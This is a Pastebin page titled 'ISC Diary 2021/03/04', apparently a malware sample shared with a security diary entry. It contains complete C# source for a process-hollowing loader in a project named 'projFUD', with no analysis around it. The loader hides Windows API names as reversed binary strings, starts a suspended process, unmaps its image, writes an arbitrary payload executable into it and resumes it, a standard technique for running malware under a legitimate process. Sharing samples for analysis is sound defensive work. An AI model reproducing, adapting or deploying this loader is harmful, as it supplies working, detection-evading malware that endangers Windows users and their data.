xme

ISC Diary 2021/03/04

xme
Mar 4th, 2021
58
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. using System;
  2. using System.Diagnostics;
  3. using System.Runtime.InteropServices;
  4. using Microsoft.VisualBasic;
  5.  
  6. namespace projFUD
  7. {
  8. public static class PA
  9. {
  10. public static string ReverseString(string Str)
  11. {
  12. string Revstr = "";
  13. int Length;
  14. Length = Str.Length - 1;
  15. while (Length >= 0)
  16. {
  17. Revstr = Revstr + Str[Length];
  18. Length--;
  19. }
  20. return Revstr;
  21. }
  22. public static string BinaryToString(string str)
  23. {
  24. string chars = System.Text.RegularExpressions.Regex.Replace(str, "[^01]", "");
  25. byte[] arr = new byte[(chars.Length / 8) - 1 + 1];
  26. for (int i = 0; i <= arr.Length - 1; i++)
  27. arr[i] = Convert.ToByte(chars.Substring(i * 8, 8), 2);
  28. return System.Text.ASCIIEncoding.ASCII.GetString(arr);
  29. }
  30. private delegate int DelegateResumeThread(IntPtr handle);
  31. private delegate bool DelegateWow64SetThreadContext(IntPtr thread, int[] context);
  32. private delegate bool DelegateSetThreadContext(IntPtr thread, int[] context);
  33. private delegate bool DelegateWow64GetThreadContext(IntPtr thread, int[] context);
  34. private delegate bool DelegateGetThreadContext(IntPtr thread, int[] context);
  35. private delegate int DelegateVirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
  36. private delegate bool DelegateWriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
  37. private delegate bool DelegateReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
  38. private delegate int DelegateZwUnmapViewOfSection(IntPtr process, int baseAddress);
  39. private delegate bool DelegateCreateProcessA(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes,
  40. bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
  41.  
  42.  
  43. private static string[] AL = Convert.ToString("0011001000110011011011000110010101101110011100100110010101101011|0110110001101100011001000111010001101110|011001000110000101100101011100100110100001010100011001010110110101110101011100110110010101010010|011101000111100001100101011101000110111001101111010000110110010001100001011001010111001001101000010101000111010001100101010100110011010000110110011101110110111101010111|01110100011110000110010101110100011011100110111101000011011001000110000101100101011100100110100001010100011101000110010101010011|011101000111100001100101011101000110111001101111010000110110010001100001011001010111001001101000010101000111010001100101010001110011010000110110011101110110111101010111|01110100011110000110010101110100011011100110111101000011011001000110000101100101011100100110100001010100011101000110010101000111|0111100001000101011000110110111101101100011011000100000101101100011000010111010101110100011100100110100101010110|011110010111001001101111011011010110010101001101011100110111001101100101011000110110111101110010010100000110010101110100011010010111001001010111|0111100101110010011011110110110101100101010011010111001101110011011001010110001101101111011100100101000001100100011000010110010101010010|0110111001101111011010010111010001100011011001010101001101100110010011110111011101100101011010010101011001110000011000010110110101101110010101010111011101011010|0100000101110011011100110110010101100011011011110111001001010000011001010111010001100001011001010111001001000011|").Split(new string[] { "|" }, StringSplitOptions.None);
  44.  
  45. private static string Kernel32 = BinaryToString(AL[0]);
  46. private static string ntdll = BinaryToString(AL[1]);
  47. private static string RsmThread = BinaryToString(AL[2]);
  48. private static string Wow64SetThreadCtx = BinaryToString(AL[3]);
  49. private static string SetThreadCtx = BinaryToString(AL[4]);
  50. private static string Wow64GetThreadCtx = BinaryToString(AL[5]);
  51. private static string GetThreadCtx = BinaryToString(AL[6]);
  52. private static string VirtualAllcEx = BinaryToString(AL[7]);
  53. private static string WriteProcessMem = BinaryToString(AL[8]);
  54. private static string ReadProcessMem = BinaryToString(AL[9]);
  55. private static string ZwUnmapViewOfSec = BinaryToString(AL[10]);
  56. private static string CreateProcA = BinaryToString(AL[11]);
  57.  
  58.  
  59. private static readonly DelegateResumeThread ResumeThread = LoadApi<DelegateResumeThread>(ReverseString(Kernel32), ReverseString(RsmThread));
  60. private static readonly DelegateWow64SetThreadContext Wow64SetThreadContext = LoadApi<DelegateWow64SetThreadContext>(ReverseString(Kernel32), ReverseString(Wow64SetThreadCtx));
  61. private static readonly DelegateSetThreadContext SetThreadContext = LoadApi<DelegateSetThreadContext>(ReverseString(Kernel32), ReverseString(SetThreadCtx));
  62. private static readonly DelegateWow64GetThreadContext Wow64GetThreadContext = LoadApi<DelegateWow64GetThreadContext>(ReverseString(Kernel32), ReverseString(Wow64GetThreadCtx));
  63. private static readonly DelegateGetThreadContext GetThreadContext = LoadApi<DelegateGetThreadContext>(ReverseString(Kernel32), ReverseString(GetThreadCtx));
  64. private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi<DelegateVirtualAllocEx>(ReverseString(Kernel32), ReverseString(VirtualAllcEx));
  65. private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi<DelegateWriteProcessMemory>(ReverseString(Kernel32), ReverseString(WriteProcessMem));
  66. private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi<DelegateReadProcessMemory>(ReverseString(Kernel32), ReverseString(ReadProcessMem));
  67. private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi<DelegateZwUnmapViewOfSection>(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec));
  68. private static readonly DelegateCreateProcessA CreateProcessA = LoadApi<DelegateCreateProcessA>(ReverseString(Kernel32), ReverseString(CreateProcA));
  69.  
  70. [DllImport("kernel32", SetLastError = true)]
  71. private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
  72. [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
  73. private static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
  74. private static CreateApi LoadApi<CreateApi>(string name, string method)
  75. {
  76. return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
  77. }
  78.  
  79. [StructLayout(LayoutKind.Sequential, Pack = 1)]
  80. private struct ProcessInformation
  81. {
  82. public readonly IntPtr ProcessHandle;
  83. public readonly IntPtr ThreadHandle;
  84. public readonly uint ProcessId;
  85. private readonly uint ThreadId;
  86. }
  87. [StructLayout(LayoutKind.Sequential, Pack = 1)]
  88. private struct StartupInformation
  89. {
  90. public uint Size;
  91. private readonly string Reserved1;
  92. private readonly string Desktop;
  93. private readonly string Title;
  94. [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)]
  95. private readonly byte[] Misc;
  96. private readonly IntPtr Reserved2;
  97. private readonly IntPtr StdInput;
  98. private readonly IntPtr StdOutput;
  99. private readonly IntPtr StdError;
  100. }
  101.  
  102.  
  103. public static void Execute(string path, byte[] payload)
  104. {
  105. for (int i = 0; i < 5; i++)
  106. {
  107. int readWrite = 0;
  108. StartupInformation si = new StartupInformation();
  109. ProcessInformation pi = new ProcessInformation();
  110. si.Size = UInt32.Parse(Marshal.SizeOf(typeof(StartupInformation)).ToString());
  111. string ToInt32 = System.Text.Encoding.Default.GetString(new byte[] { 0x54, 0x6F, 0x49, 0x6E, 0x74, 0x33, 0x32 });
  112. string ToInt16 = System.Text.Encoding.Default.GetString(new byte[] { 0x54, 0x6F, 0x49, 0x6E, 0x74, 0x31, 0x36 });
  113.  
  114. try
  115. {
  116. if (!CreateProcessA(path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 4 | 134217728, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
  117. int fileAddress = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, (30 * 2) } });
  118. int imageBase = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, fileAddress + (26 * 2) } });
  119. int[] context = new int[Convert.ToInt32(89 + 90)];
  120. context[0] = 65538;
  121. if (IntPtr.Size == 4)
  122. { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
  123. else
  124. { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
  125. int ebx = context[(20 + 21)];
  126. int baseAddress = 0;
  127. if (!ReadProcessMemory(pi.ProcessHandle, ebx + 8, ref baseAddress, 4, ref readWrite)) throw new Exception();
  128. if (imageBase == baseAddress)
  129. if (ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0) throw new Exception();
  130. int sizeOfImage = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, fileAddress + 80 });
  131. int sizeOfHeaders = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, fileAddress + 84 });
  132. bool allowOverride = false;
  133. int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 12288, 64);
  134.  
  135. if (newImageBase == 0) throw new Exception();
  136. if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) throw new Exception();
  137. int sectionOffset = fileAddress + 248;
  138. short numberOfSections = BitConverter.ToInt16(payload, fileAddress + 6);
  139. for (int I = 0; I < numberOfSections; I++)
  140. {
  141. int virtualAddress = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 12 });
  142. int sizeOfRawData = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 16 });
  143. int pointerToRawData = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 20 });
  144. if (sizeOfRawData != 0)
  145. {
  146. byte[] sectionData = new byte[sizeOfRawData];
  147. Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0, sectionData.Length);
  148. if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
  149. }
  150. sectionOffset += 40;
  151. }
  152. byte[] GB = BitConverter.GetBytes(newImageBase);
  153. if (!WriteProcessMemory(pi.ProcessHandle, ebx + 8, GB, 4, ref readWrite)) throw new Exception();
  154. int addressOfEntryPoint = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, fileAddress + 40 } });
  155. if (allowOverride) newImageBase = imageBase;
  156. context[44] = newImageBase + addressOfEntryPoint;
  157. if (IntPtr.Size == 4)
  158. {
  159. var x = SetThreadContext(pi.ThreadHandle, context);
  160. if (!x)
  161. {
  162. throw new Exception();
  163. }
  164. }
  165. else
  166. {
  167. var y = Wow64SetThreadContext(pi.ThreadHandle, context);
  168. if (!y)
  169. {
  170. throw new Exception();
  171. }
  172. }
  173.  
  174. int r = (int)Interaction.CallByName(ResumeThread, BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { pi.ThreadHandle });
  175.  
  176. if (r == -1 * 1)
  177. {
  178. throw new Exception();
  179. }
  180. }
  181. catch
  182. {
  183. Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
  184. continue;
  185. }
  186. break;
  187. }
  188. }
  189. }
  190. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×